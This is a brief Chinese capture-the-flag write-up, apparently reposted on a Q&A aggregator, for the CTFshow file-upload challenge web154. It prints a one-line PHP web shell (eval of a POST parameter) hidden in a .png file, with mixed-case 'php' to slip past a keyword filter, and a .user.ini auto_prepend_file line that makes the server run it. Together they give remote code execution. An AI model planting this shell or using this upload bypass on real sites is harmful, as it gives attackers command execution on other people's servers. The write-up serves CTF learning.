當(dāng)前位置：首頁 > 编程资源 > 编程问答 >内容正文

编程问答

CTFshow 文件上传 web154

發(fā)布時間：2025/4/16 编程问答 16 豆豆

生活随笔收集整理的這篇文章主要介紹了 CTFshow 文件上传 web154 小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.

上傳一個包含shell的png文件,發(fā)現(xiàn)上傳失敗

清空文件內(nèi)容,發(fā)現(xiàn)上傳成功,可能過濾文件中的關(guān)鍵字,經(jīng)過嘗試,猜測文件對php進(jìn)行過濾,可以用大小寫來繞過

shell.png

<?phPecho 123;pHpinfo();eval($_POST['cmd']); ?>

發(fā)現(xiàn)其他和上題一樣,直接上傳.user.ini
.user.ini

auto_prepend_file=shell.png

然后訪問/upload/index.php,直接RCE

…

以上是生活随笔為你收集整理的CTFshow 文件上传 web154的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。